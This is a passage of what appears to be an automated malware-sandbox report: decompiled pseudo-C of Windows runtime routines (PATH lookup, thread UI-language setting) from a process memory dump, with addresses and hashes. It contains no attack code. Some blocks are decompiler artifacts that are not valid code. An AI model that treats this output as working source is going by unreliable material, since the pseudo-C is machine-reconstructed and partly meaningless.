                                                                									__ebx = __ebx + 2;
                                                                									__eflags = __ebx;
                                                                									goto L53;
                                                                								}
                                                                								goto L14;
                                                                							case 1:
                                                                								L44:
                                                                								_t306 =  &_v64;
                                                                								_v80 = E01652E3E(0,  &_v64);
                                                                								_t276 = _t276 + _v64 + 2;
                                                                								goto L13;
                                                                							case 2:
                                                                								__eax =  *0x1718480 & 0x0000ffff;
                                                                								__ebx = __ebx + __eax;
                                                                								__eflags = __dl;
                                                                								if(__dl != 0) {
                                                                									__eax = 0x1718480;
                                                                									goto L80;
                                                                								}
                                                                								goto L14;
                                                                							case 3:
                                                                								__eax = E0163EEF0(0x17179a0);
                                                                								__eax =  &_v44;
                                                                								_push(__eax);
                                                                								_push(0);
                                                                								_push(0);
                                                                								_push(4);
                                                                								_push(L"PATH");
                                                                								_push(0);
                                                                								L57();
                                                                								__esi = __eax;
                                                                								_v68 = __esi;
                                                                								__eflags = __esi - 0xc0000023;
                                                                								if(__esi != 0xc0000023) {
                                                                									L10:
                                                                									__eax = E0163EB70(__ecx, 0x17179a0);
                                                                									__eflags = __esi - 0xc0000100;
                                                                									if(__esi == 0xc0000100) {
                                                                										_v44 = _v44 & 0x00000000;
                                                                										__eax = 0;
                                                                										_v68 = 0;
                                                                										goto L13;
                                                                									} else {
                                                                										__eflags = __esi;
                                                                										if(__esi < 0) {
                                                                											L32:
                                                                											_t209 = _v72;
                                                                											__eflags = _t209;
                                                                											if(_t209 != 0) {
                                                                												L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t209);
                                                                											}
                                                                											_t210 = _v52;
                                                                											__eflags = _t210;
                                                                											if(_t210 != 0) {
                                                                												__eflags = _t325;
                                                                												if(_t325 < 0) {
                                                                													L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t210);
                                                                													_t210 = 0;
                                                                												}
                                                                											}
                                                                											goto L36;
                                                                										} else {
                                                                											__eax = _v44;
                                                                											__ebx = __ebx + __eax * 2;
                                                                											__ebx = __ebx + 2;
                                                                											__eflags = __ebx;
                                                                											L13:
                                                                											_t286 = _v36;
                                                                											goto L14;
                                                                										}
                                                                									}
                                                                								} else {
                                                                									__eax = _v44;
                                                                									__ecx =  *0x1717b9c; // 0x0
                                                                									_v44 + _v44 =  *[fs:0x30];
                                                                									__ecx = __ecx + 0x180000;
                                                                									__eax = L01644620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
                                                                									_v72 = __eax;
                                                                									__eflags = __eax;
                                                                									if(__eax == 0) {
                                                                										__eax = E0163EB70(__ecx, 0x17179a0);
                                                                										__eax = _v52;
                                                                										L36:
                                                                										_pop(_t318);
                                                                										_pop(_t326);
                                                                										__eflags = _v8 ^ _t331;
                                                                										_pop(_t277);
                                                                										return E0166B640(_t210, _t277, _v8 ^ _t331, _t306, _t318, _t326);
                                                                									} else {
                                                                										__ecx =  &_v44;
                                                                										_push(__ecx);
                                                                										_push(_v44);
                                                                										_push(__eax);
                                                                										_push(4);
                                                                										_push(L"PATH");
                                                                										_push(0);
                                                                										L57();
                                                                										__esi = __eax;
                                                                										_v68 = __eax;
                                                                										goto L10;
                                                                									}
                                                                								}
                                                                								goto L108;
                                                                							case 4:
                                                                								__ebx = __ebx + 4;
                                                                								goto L14;
                                                                							case 5:
                                                                								_t272 = _v56;
                                                                								if(_v56 != 0) {
                                                                									_t306 =  &_v36;
                                                                									_t274 = E01652E3E(_t272,  &_v36);
                                                                									_t286 = _v36;
                                                                									_v76 = _t274;
                                                                								}
                                                                								if(_t286 == 0) {
                                                                									goto L44;
                                                                								} else {
                                                                									_t276 = _t276 + 2 + _t286;
                                                                								}
                                                                								goto L14;
                                                                							case 6:
                                                                								__eax =  *0x1715764 & 0x0000ffff;
                                                                								goto L53;
                                                                							case 7:
                                                                								__eax =  *0x1718478 & 0x0000ffff;
                                                                								__ebx = __ebx + __eax;
                                                                								__eflags = _a8;
                                                                								if(_a8 != 0) {
                                                                									__ebx = __ebx + 0x16;
                                                                									__ebx = __ebx + __eax;
                                                                								}
                                                                								__eflags = __dl;
                                                                								if(__dl != 0) {
                                                                									__eax = 0x1718478;
                                                                									L80:
                                                                									_v32 = __eax;
                                                                								}
                                                                								goto L14;
                                                                							case 8:
                                                                								__eax =  *0x1716e58 & 0x0000ffff;
                                                                								__eax = ( *0x1716e58 & 0x0000ffff) + 2;
                                                                								L53:
                                                                								__ebx = __ebx + __eax;
                                                                								L14:
                                                                								_t317 = _t317 + 1;
                                                                								if(_t317 >= _v48) {
                                                                									goto L16;
                                                                								} else {
                                                                									_t306 = _v37;
                                                                									goto L1;
                                                                								}
                                                                								goto L108;
                                                                						}
                                                                					}
                                                                					L56:
                                                                					_t291 = 0x25;
                                                                					asm("int 0x29");
                                                                					asm("out 0x28, al");
                                                                					 *[gs:esi+0x28] =  *[gs:esi+0x28] + _t335;
                                                                					_t236 = _t235 + _t335;
                                                                					asm("daa");
                                                                					 *[gs:esi] =  *[gs:esi] + _t331;
                                                                					 *[gs:esi+0x28] =  *[gs:esi+0x28] + _t236;
                                                                					 *[gs:0x1f016526] =  *[gs:0x1f016526] + _t236;
                                                                					_pop(_t281);
                                                                					_t238 =  *_t291 * 0x01652894 ^ 0x0201695b;
                                                                					_v3 = _v3 - _t335;
                                                                					 *_t238 =  *_t238 - 0x65;
                                                                					asm("daa");
                                                                					 *[gs:esi] =  *[gs:esi] + _t281;
                                                                					_v3 = _v3 - _t238;
                                                                					_t328 = _t324 + _t324 - 1;
                                                                					_v3 = _v3 - _t238;
                                                                					asm("daa");
                                                                					_pop(_t282);
                                                                					asm("int3");
                                                                					asm("int3");
                                                                					asm("int3");
                                                                					asm("int3");
                                                                					asm("int3");
                                                                					asm("int3");
                                                                					asm("int3");
                                                                					asm("int3");
                                                                					asm("int3");
                                                                					asm("int3");
                                                                					asm("int3");
                                                                					asm("int3");
                                                                					asm("int3");
                                                                					asm("int3");
                                                                					asm("int3");
                                                                					_push(0x20);
                                                                					_push(0x16fff00);
                                                                					E0167D08C(_t282, _t319, _t328);
                                                                					_v44 =  *[fs:0x18];
                                                                					_t320 = 0;
                                                                					 *_a24 = 0;
                                                                					_t283 = _a12;
                                                                					__eflags = _t283;
                                                                					if(_t283 == 0) {
                                                                						_t245 = 0xc0000100;
                                                                					} else {
                                                                						_v8 = 0;
                                                                						_t329 = 0xc0000100;
                                                                						_v52 = 0xc0000100;
                                                                						_t247 = 4;
                                                                						while(1) {
                                                                							_v40 = _t247;
                                                                							__eflags = _t247;
                                                                							if(_t247 == 0) {
                                                                								break;
                                                                							}
                                                                							_t296 = _t247 * 0xc;
                                                                							_v48 = _t296;
                                                                							__eflags = _t283 -  *((intOrPtr*)(_t296 + 0x1601664));
                                                                							if(__eflags <= 0) {
                                                                								if(__eflags == 0) {
                                                                									_t262 = E0166E5C0(_a8,  *((intOrPtr*)(_t296 + 0x1601668)), _t283);
                                                                									_t335 = _t335 + 0xc;
                                                                									__eflags = _t262;
                                                                									if(__eflags == 0) {
                                                                										_t329 = E016A51BE(_t283,  *((intOrPtr*)(_v48 + 0x160166c)), _a16, _t320, _t329, __eflags, _a20, _a24);
                                                                										_v52 = _t329;
                                                                										break;
                                                                									} else {
                                                                										_t247 = _v40;
                                                                										goto L62;
                                                                									}
                                                                									goto L70;
                                                                								} else {
                                                                									L62:
                                                                									_t247 = _t247 - 1;
                                                                									continue;
                                                                								}
                                                                							}
                                                                							break;
                                                                						}
                                                                						_v32 = _t329;
                                                                						__eflags = _t329;
                                                                						if(_t329 < 0) {
                                                                							__eflags = _t329 - 0xc0000100;
                                                                							if(_t329 == 0xc0000100) {
                                                                								_t292 = _a4;
                                                                								__eflags = _t292;
                                                                								if(_t292 != 0) {
                                                                									_v36 = _t292;
                                                                									__eflags =  *_t292 - _t320;
                                                                									if( *_t292 == _t320) {
                                                                										_t329 = 0xc0000100;
                                                                										goto L76;
                                                                									} else {
                                                                										_t308 =  *((intOrPtr*)(_v44 + 0x30));
                                                                										_t249 =  *((intOrPtr*)(_t308 + 0x10));
                                                                										__eflags =  *((intOrPtr*)(_t249 + 0x48)) - _t292;
                                                                										if( *((intOrPtr*)(_t249 + 0x48)) == _t292) {
                                                                											__eflags =  *(_t308 + 0x1c);
                                                                											if( *(_t308 + 0x1c) == 0) {
                                                                												L106:
                                                                												_t329 = E01652AE4( &_v36, _a8, _t283, _a16, _a20, _a24);
                                                                												_v32 = _t329;
                                                                												__eflags = _t329 - 0xc0000100;
                                                                												if(_t329 != 0xc0000100) {
                                                                													goto L69;
                                                                												} else {
                                                                													_t320 = 1;
                                                                													_t292 = _v36;
                                                                													goto L75;
                                                                												}
                                                                											} else {
                                                                												_t252 = E01636600( *(_t308 + 0x1c));
                                                                												__eflags = _t252;
                                                                												if(_t252 != 0) {
                                                                													goto L106;
                                                                												} else {
                                                                													_t292 = _a4;
                                                                													goto L75;
                                                                												}
                                                                											}
                                                                										} else {
                                                                											L75:
                                                                											_t329 = E01652C50(_t292, _a8, _t283, _a16, _a20, _a24, _t320);
                                                                											L76:
                                                                											_v32 = _t329;
                                                                											goto L69;
                                                                										}
                                                                									}
                                                                									goto L108;
                                                                								} else {
                                                                									E0163EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                									_v8 = 1;
                                                                									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
                                                                									_t329 = _a24;
                                                                									_t259 = E01652AE4( &_v36, _a8, _t283, _a16, _a20, _t329);
                                                                									_v32 = _t259;
                                                                									__eflags = _t259 - 0xc0000100;
                                                                									if(_t259 == 0xc0000100) {
                                                                										_v32 = E01652C50(_v36, _a8, _t283, _a16, _a20, _t329, 1);
                                                                									}
                                                                									_v8 = _t320;
                                                                									E01652ACB();
                                                                								}
                                                                							}
                                                                						}
                                                                						L69:
                                                                						_v8 = 0xfffffffe;
                                                                						_t245 = _t329;
                                                                					}
                                                                					L70:
                                                                					return E0167D0D1(_t245);
                                                                				}
                                                                				L108:
                                                                 			}
                                                                0x01652638
                                                                0x0165263b
                                                                0x0165263c
                                                                0x0165263e
                                                                0x01652640
                                                                0x01652642
                                                                0x01652647
                                                                0x01652649
                                                                0x0165264e
                                                                0x01652650
                                                                0x01652653
                                                                0x01652659
                                                                0x016526a2
                                                                0x016526a7
                                                                0x016526ac
                                                                0x016526b2
                                                                0x01695b11
                                                                0x01695b15
                                                                0x01695b17
                                                                0x00000000
                                                                0x016526b8
                                                                0x016526b8
                                                                0x016526ba
                                                                0x016527a6
                                                                0x016527a6
                                                                0x016527a9
                                                                0x016527ab
                                                                0x016527b9
                                                                0x016527b9
                                                                0x016527be
                                                                0x016527c1
                                                                0x016527c3
                                                                0x016527c5
                                                                0x016527c7
                                                                0x01695c74
                                                                0x01695c79
                                                                0x01695c79
                                                                0x016527c7
                                                                0x00000000
                                                                0x016526c0
                                                                0x016526c0
                                                                0x016526c3
                                                                0x016526c6
                                                                0x016526c6
                                                                0x016526c9
                                                                0x016526c9
                                                                0x00000000
                                                                0x016526c9
                                                                0x016526ba
                                                                0x0165265b
                                                                0x0165265b
                                                                0x0165265e
                                                                0x01652667
                                                                0x0165266d
                                                                0x01652677
                                                                0x0165267c
                                                                0x0165267f
                                                                0x01652681
                                                                0x01695b49
                                                                0x01695b4e
                                                                0x016527cd
                                                                0x016527d0
                                                                0x016527d1
                                                                0x016527d2
                                                                0x016527d4
                                                                0x016527dd
                                                                0x01652687
                                                                0x01652687
                                                                0x0165268a
                                                                0x0165268b
                                                                0x0165268e
                                                                0x0165268f
                                                                0x01652691
                                                                0x01652696
                                                                0x01652698
                                                                0x0165269d
                                                                0x0165269f
                                                                0x00000000
                                                                0x0165269f
                                                                0x01652681
                                                                0x00000000
                                                                0x00000000
                                                                0x01652846
                                                                0x00000000
                                                                0x00000000
                                                                0x01652605
                                                                0x0165260a
                                                                0x0165260c
                                                                0x01652611
                                                                0x01652616
                                                                0x01652619
                                                                0x01652619
                                                                0x0165261e
                                                                0x00000000
                                                                0x01652624
                                                                0x01652627
                                                                0x01652627
                                                                0x00000000
                                                                0x00000000
                                                                0x01695b1f
                                                                0x00000000
                                                                0x00000000
                                                                0x01652894
                                                                0x0165289b
                                                                0x0165289d
                                                                0x016528a1
                                                                0x01695b2b
                                                                0x01695b2e
                                                                0x01695b2e
                                                                0x016528a7
                                                                0x016528a9
                                                                0x01695b04
                                                                0x01695b09
                                                                0x01695b09
                                                                0x01695b09
                                                                0x00000000
                                                                0x00000000
                                                                0x01695b35
                                                                0x01695b3c
                                                                0x016528fb
                                                                0x016528fb
                                                                0x016526cc
                                                                0x016526cc
                                                                0x016526d0
                                                                0x00000000
                                                                0x016526d2
                                                                0x016526d2
                                                                0x00000000
                                                                0x016526d2
                                                                0x00000000
                                                                0x00000000
                                                                0x016525fe
                                                                0x0165292d
                                                                0x0165292f
                                                                0x01652930
                                                                0x01652935
                                                                0x01652937
                                                                0x0165293b
                                                                0x0165293e
                                                                0x0165293f
                                                                0x01652942
                                                                0x01652947
                                                                0x0165294e
                                                                0x01652955
                                                                0x0165295a
                                                                0x0165295d
                                                                0x01652962
                                                                0x01652963
                                                                0x01652966
                                                                0x01652969
                                                                0x0165296a
                                                                0x0165296e
                                                                0x01652972
                                                                0x01652981
                                                                0x01652982
                                                                0x01652983
                                                                0x01652984
                                                                0x01652985
                                                                0x01652986
                                                                0x01652987
                                                                0x01652988
                                                                0x01652989
                                                                0x0165298a
                                                                0x0165298b
                                                                0x0165298c
                                                                0x0165298d
                                                                0x0165298e
                                                                0x0165298f
                                                                0x01652990
                                                                0x01652992
                                                                0x01652997
                                                                0x016529a3
                                                                0x016529a6
                                                                0x016529ab
                                                                0x016529ad
                                                                0x016529b0
                                                                0x016529b2
                                                                0x01695c80
                                                                0x016529b8
                                                                0x016529b8
                                                                0x016529bb
                                                                0x016529c0
                                                                0x016529c5
                                                                0x016529c6
                                                                0x016529c6
                                                                0x016529c9
                                                                0x016529cb
                                                                0x00000000
                                                                0x00000000
                                                                0x016529cd
                                                                0x016529d0
                                                                0x016529d9
                                                                0x016529db
                                                                0x016529dd
                                                                0x01652a7f
                                                                0x01652a84
                                                                0x01652a87
                                                                0x01652a89
                                                                0x01695ca1
                                                                0x01695ca3
                                                                0x00000000
                                                                0x01652a8f
                                                                0x01652a8f
                                                                0x00000000
                                                                0x01652a8f
                                                                0x00000000
                                                                0x016529e3
                                                                0x016529e3
                                                                0x016529e3
                                                                0x00000000
                                                                0x016529e3
                                                                0x016529dd
                                                                0x00000000
                                                                0x016529db
                                                                0x016529e6
                                                                0x016529e9
                                                                0x016529eb
                                                                0x016529ed
                                                                0x016529f3
                                                                0x016529f5
                                                                0x016529f8
                                                                0x016529fa
                                                                0x01652a97
                                                                0x01652a9a
                                                                0x01652a9d
                                                                0x01652add
                                                                0x00000000
                                                                0x01652a9f
                                                                0x01652aa2
                                                                0x01652aa5
                                                                0x01652aa8
                                                                0x01652aab
                                                                0x01695cab
                                                                0x01695caf
                                                                0x01695cc5
                                                                0x01695cda
                                                                0x01695cdc
                                                                0x01695cdf
                                                                0x01695ce5
                                                                0x00000000
                                                                0x01695ceb
                                                                0x01695ced
                                                                0x01695cee
                                                                0x00000000
                                                                0x01695cee
                                                                0x01695cb1
                                                                0x01695cb4
                                                                0x01695cb9
                                                                0x01695cbb
                                                                0x00000000
                                                                0x01695cbd
                                                                0x01695cbd
                                                                0x00000000
                                                                0x01695cbd
                                                                0x01695cbb
                                                                0x01652ab1
                                                                0x01652ab1
                                                                0x01652ac4
                                                                0x01652ac6
                                                                0x01652ac6
                                                                0x00000000
                                                                0x01652ac6
                                                                0x01652aab
                                                                0x00000000
                                                                0x01652a00
                                                                0x01652a09
                                                                0x01652a0e
                                                                0x01652a21
                                                                0x01652a24
                                                                0x01652a35
                                                                0x01652a3a
                                                                0x01652a3d
                                                                0x01652a42
                                                                0x01652a59
                                                                0x01652a59
                                                                0x01652a5c
                                                                0x01652a5f
                                                                0x01652a5f
                                                                0x016529fa
                                                                0x016529f3
                                                                0x01652a64
                                                                0x01652a64
                                                                0x01652a6b
                                                                0x01652a6b
                                                                0x01652a6d
                                                                0x01652a72
                                                                0x01652a72
                                                                0x00000000

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: PATH
                                                                • API String ID: 0-1036084923
                                                                • Opcode ID: 0d6c06bb376d882a6e0c1084f0995554ac257d80c4fa305479100c461469e921
                                                                • Instruction ID: dbf957dfdca679d70d0a6deac8c28a015ac42d0d8023ba950da50cf84d3bcaf5
                                                                • Opcode Fuzzy Hash: 0d6c06bb376d882a6e0c1084f0995554ac257d80c4fa305479100c461469e921
                                                                • Instruction Fuzzy Hash: CCC15AB1E00219DBDB65DF99DCA1ABEBBB5FF58710F04402DE901AB350DB34A942CB64
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 80%
                                                                			E0165FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
                                                                				char _v5;
                                                                				signed int _v8;
                                                                				signed int _v12;
                                                                				char _v16;
                                                                				char _v17;
                                                                				char _v20;
                                                                				signed int _v24;
                                                                				char _v28;
                                                                				char _v32;
                                                                				signed int _v40;
                                                                				void* __ecx;
                                                                				void* __edi;
                                                                				void* __ebp;
                                                                				signed int _t73;
                                                                				intOrPtr* _t75;
                                                                				signed int _t77;
                                                                				signed int _t79;
                                                                				signed int _t81;
                                                                				intOrPtr _t83;
                                                                				intOrPtr _t85;
                                                                				intOrPtr _t86;
                                                                				signed int _t91;
                                                                				signed int _t94;
                                                                				signed int _t95;
                                                                				signed int _t96;
                                                                				signed int _t106;
                                                                				signed int _t108;
                                                                				signed int _t114;
                                                                				signed int _t116;
                                                                				signed int _t118;
                                                                				signed int _t122;
                                                                				signed int _t123;
                                                                				void* _t129;
                                                                				signed int _t130;
                                                                				void* _t132;
                                                                				intOrPtr* _t134;
                                                                				signed int _t138;
                                                                				signed int _t141;
                                                                				signed int _t147;
                                                                				intOrPtr _t153;
                                                                				signed int _t154;
                                                                				signed int _t155;
                                                                				signed int _t170;
                                                                				void* _t174;
                                                                				signed int _t176;
                                                                				signed int _t177;
                                                                
                                                                				_t129 = __ebx;
                                                                				_push(_t132);
                                                                				_push(__esi);
                                                                				_t174 = _t132;
                                                                				_t73 =  !( *( *(_t174 + 0x18)));
                                                                				if(_t73 >= 0) {
                                                                					L5:
                                                                					return _t73;
                                                                				} else {
                                                                					E0163EEF0(0x1717b60);
                                                                					_t134 =  *0x1717b84; // 0x77997b80
                                                                					_t2 = _t174 + 0x24; // 0x24
                                                                					_t75 = _t2;
                                                                					if( *_t134 != 0x1717b80) {
                                                                						_push(3);
                                                                						asm("int 0x29");
                                                                						asm("int3");
                                                                						asm("int3");
                                                                						asm("int3");
                                                                						asm("int3");
                                                                						asm("int3");
                                                                						asm("int3");
                                                                						asm("int3");
                                                                						asm("int3");
                                                                						asm("int3");
                                                                						asm("int3");
                                                                						asm("int3");
                                                                						asm("int3");
                                                                						asm("int3");
                                                                						asm("int3");
                                                                						asm("int3");
                                                                						asm("int3");
                                                                						asm("int3");
                                                                						asm("int3");
                                                                						asm("int3");
                                                                						_push(0x1717b60);
                                                                						_t170 = _v8;
                                                                						_v28 = 0;
                                                                						_v40 = 0;
                                                                						_v24 = 0;
                                                                						_v17 = 0;
                                                                						_v32 = 0;
                                                                						__eflags = _t170 & 0xffff7cf2;
                                                                						if((_t170 & 0xffff7cf2) != 0) {
                                                                							L43:
                                                                							_t77 = 0xc000000d;
                                                                						} else {
                                                                							_t79 = _t170 & 0x0000000c;
                                                                							__eflags = _t79;
                                                                							if(_t79 != 0) {
                                                                								__eflags = _t79 - 0xc;
                                                                								if(_t79 == 0xc) {
                                                                									goto L43;
                                                                								} else {
                                                                									goto L9;
                                                                								}
                                                                							} else {
                                                                								_t170 = _t170 | 0x00000008;
                                                                								__eflags = _t170;
                                                                								L9:
                                                                								_t81 = _t170 & 0x00000300;
                                                                								__eflags = _t81 - 0x300;
                                                                								if(_t81 == 0x300) {
                                                                									goto L43;
                                                                								} else {
                                                                									_t138 = _t170 & 0x00000001;
                                                                									__eflags = _t138;
                                                                									_v24 = _t138;
                                                                									if(_t138 != 0) {
                                                                										__eflags = _t81;
                                                                										if(_t81 != 0) {
                                                                											goto L43;
                                                                										} else {
                                                                											goto L11;
                                                                										}
                                                                									} else {
                                                                										L11:
                                                                										_push(_t129);
                                                                										_t77 = E01636D90( &_v20);
                                                                										_t130 = _t77;
                                                                										__eflags = _t130;
                                                                										if(_t130 >= 0) {
                                                                											_push(_t174);
                                                                											__eflags = _t170 & 0x00000301;
                                                                											if((_t170 & 0x00000301) == 0) {
                                                                												_t176 = _a8;
                                                                												__eflags = _t176;
                                                                												if(__eflags == 0) {
                                                                													L64:
                                                                													_t83 =  *[fs:0x18];
                                                                													_t177 = 0;
                                                                													__eflags =  *(_t83 + 0xfb8);
                                                                													if( *(_t83 + 0xfb8) != 0) {
                                                                														E016376E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
                                                                														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
                                                                													}
                                                                													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
                                                                													goto L15;
                                                                												} else {
                                                                													asm("sbb edx, edx");
                                                                													_t114 = E016C8938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
                                                                													__eflags = _t114;
                                                                													if(_t114 < 0) {
                                                                														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
                                                                														E0162B150();
                                                                													}
                                                                													_t116 = E016C6D81(_t176,  &_v16);
                                                                													__eflags = _t116;
                                                                													if(_t116 >= 0) {
                                                                														__eflags = _v16 - 2;
                                                                														if(_v16 < 2) {
                                                                															L56:
                                                                															_t118 = E016375CE(_v20, 5, 0);
                                                                															__eflags = _t118;
                                                                															if(_t118 < 0) {
                                                                																L67:
                                                                																_t130 = 0xc0000017;
                                                                																goto L32;
                                                                															} else {
                                                                																__eflags = _v12;
                                                                																if(_v12 == 0) {
                                                                																	goto L67;
                                                                																} else {
                                                                																	_t153 =  *0x1718638; // 0x0
                                                                																	_t122 = L016338A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
                                                                																	_t154 = _v12;
                                                                																	_t130 = _t122;
                                                                																	__eflags = _t130;
                                                                																	if(_t130 >= 0) {
                                                                																		_t123 =  *(_t154 + 4) & 0x0000ffff;
                                                                																		__eflags = _t123;
                                                                																		if(_t123 != 0) {
                                                                																			_t155 = _a12;
                                                                																			__eflags = _t155;
                                                                																			if(_t155 != 0) {
                                                                																				 *_t155 = _t123;
                                                                																			}
                                                                																			goto L64;
                                                                																		} else {
                                                                																			E016376E2(_t154);
                                                                																			goto L41;
                                                                																		}
                                                                																	} else {
                                                                																		E016376E2(_t154);
                                                                																		_t177 = 0;
                                                                																		goto L18;
                                                                																	}
                                                                																}
                                                                															}
                                                                														} else {
                                                                															__eflags =  *_t176;
                                                                															if( *_t176 != 0) {
                                                                																goto L56;
                                                                															} else {
                                                                																__eflags =  *(_t176 + 2);
                                                                																if( *(_t176 + 2) == 0) {
                                                                																	goto L64;
                                                                																} else {
                                                                																	goto L56;
                                                                																}
                                                                															}
                                                                														}
                                                                													} else {
                                                                														_t130 = 0xc000000d;
                                                                														goto L32;
                                                                													}
                                                                												}
                                                                												goto L35;
                                                                											} else {
                                                                												__eflags = _a8;
                                                                												if(_a8 != 0) {
                                                                													_t77 = 0xc000000d;
                                                                												} else {
                                                                													_v5 = 1;
                                                                													L0165FCE3(_v20, _t170);
                                                                													_t177 = 0;
                                                                													__eflags = 0;
                                                                													L15:
                                                                													_t85 =  *[fs:0x18];
                                                                													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
                                                                													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
                                                                														L18:
                                                                														__eflags = _t130;
                                                                														if(_t130 != 0) {
                                                                															goto L32;
                                                                														} else {
                                                                															__eflags = _v5 - _t130;
                                                                															if(_v5 == _t130) {
                                                                																goto L32;
                                                                															} else {
                                                                																_t86 =  *[fs:0x18];
                                                                																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
                                                                																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
                                                                																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
                                                                																}
                                                                																__eflags = _t177;
                                                                																if(_t177 == 0) {
                                                                																	L31:
                                                                																	__eflags = 0;
                                                                																	L016370F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
                                                                																	goto L32;
                                                                																} else {
                                                                																	__eflags = _v24;
                                                                																	_t91 =  *(_t177 + 0x20);
                                                                																	if(_v24 != 0) {
                                                                																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
                                                                																		goto L31;
                                                                																	} else {
                                                                																		_t141 = _t91 & 0x00000040;
                                                                																		__eflags = _t170 & 0x00000100;
                                                                																		if((_t170 & 0x00000100) == 0) {
                                                                																			__eflags = _t141;
                                                                																			if(_t141 == 0) {
                                                                																				L74:
                                                                																				_t94 = _t91 & 0xfffffffd | 0x00000004;
                                                                																				goto L27;
                                                                																			} else {
                                                                																				_t177 = E0165FD22(_t177);
                                                                																				__eflags = _t177;
                                                                																				if(_t177 == 0) {
                                                                																					goto L42;
                                                                																				} else {
                                                                																					_t130 = E0165FD9B(_t177, 0, 4);
                                                                																					__eflags = _t130;
                                                                																					if(_t130 != 0) {
                                                                																						goto L42;
                                                                																					} else {
                                                                																						_t68 = _t177 + 0x20;
                                                                																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
                                                                																						__eflags =  *_t68;
                                                                																						_t91 =  *(_t177 + 0x20);
                                                                																						goto L74;
                                                                																					}
                                                                																				}
                                                                																			}
                                                                																			goto L35;
                                                                																		} else {
                                                                																			__eflags = _t141;
                                                                																			if(_t141 != 0) {
                                                                																				_t177 = E0165FD22(_t177);
                                                                																				__eflags = _t177;
                                                                																				if(_t177 == 0) {
                                                                																					L42:
                                                                																					_t77 = 0xc0000001;
                                                                																					goto L33;
                                                                																				} else {
                                                                																					_t130 = E0165FD9B(_t177, 0, 4);
                                                                																					__eflags = _t130;
                                                                																					if(_t130 != 0) {
                                                                																						goto L42;
                                                                																					} else {
                                                                																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
                                                                																						_t91 =  *(_t177 + 0x20);
                                                                																						goto L26;
                                                                																					}
                                                                																				}
                                                                																				goto L35;
                                                                																			} else {
                                                                																				L26:
                                                                																				_t94 = _t91 & 0xfffffffb | 0x00000002;
                                                                																				__eflags = _t94;
                                                                																				L27:
                                                                																				 *(_t177 + 0x20) = _t94;
                                                                																				__eflags = _t170 & 0x00008000;
                                                                																				if((_t170 & 0x00008000) != 0) {
                                                                																					_t95 = _a12;
                                                                																					__eflags = _t95;
                                                                																					if(_t95 != 0) {
                                                                																						_t96 =  *_t95;
                                                                																						__eflags = _t96;
                                                                																						if(_t96 != 0) {
                                                                																							 *((short*)(_t177 + 0x22)) = 0;
                                                                																							_t40 = _t177 + 0x20;
                                                                																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
                                                                																							__eflags =  *_t40;
                                                                																						}
                                                                																					}
                                                                																				}
                                                                																				goto L31;
                                                                																			}
                                                                																		}
                                                                																	}
                                                                																}
                                                                															}
                                                                														}
                                                                													} else {
                                                                														_t147 =  *( *[fs:0x18] + 0xfc0);
                                                                														_t106 =  *(_t147 + 0x20);
                                                                														__eflags = _t106 & 0x00000040;
                                                                														if((_t106 & 0x00000040) != 0) {
                                                                															_t147 = E0165FD22(_t147);
                                                                															__eflags = _t147;
                                                                															if(_t147 == 0) {
                                                                																L41:
                                                                																_t130 = 0xc0000001;
                                                                																L32:
                                                                																_t77 = _t130;
                                                                																goto L33;
                                                                															} else {
                                                                																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
                                                                																_t106 =  *(_t147 + 0x20);
                                                                																goto L17;
                                                                															}
                                                                															goto L35;
                                                                														} else {
                                                                															L17:
                                                                															_t108 = _t106 | 0x00000080;
                                                                															__eflags = _t108;
                                                                															 *(_t147 + 0x20) = _t108;
                                                                															 *( *[fs:0x18] + 0xfc0) = _t147;
                                                                															goto L18;
                                                                														}
                                                                													}
                                                                												}
                                                                											}
                                                                											L33:
                                                                										}
                                                                									}
                                                                								}
                                                                							}
                                                                						}
                                                                						L35:
                                                                						return _t77;
                                                                					} else {
                                                                						 *_t75 = 0x1717b80;
                                                                						 *((intOrPtr*)(_t75 + 4)) = _t134;
                                                                						 *_t134 = _t75;
                                                                						 *0x1717b84 = _t75;
                                                                						_t73 = E0163EB70(_t134, 0x1717b60);
                                                                						if( *0x1717b20 != 0) {
                                                                							_t73 =  *( *[fs:0x30] + 0xc);
                                                                							if( *((char*)(_t73 + 0x28)) == 0) {
                                                                								_t73 = E0163FF60( *0x1717b20);
                                                                							}
                                                                						}
                                                                						goto L5;
                                                                					}
                                                                				}
                                                                			}
                                                                0x00000000
                                                                0x0165fb78
                                                                0x0165fb7a
                                                                0x0165fb7a
                                                                0x0165fb7d
                                                                0x0165fb80
                                                                0x0169bddf
                                                                0x0169bde1
                                                                0x00000000
                                                                0x0169bde3
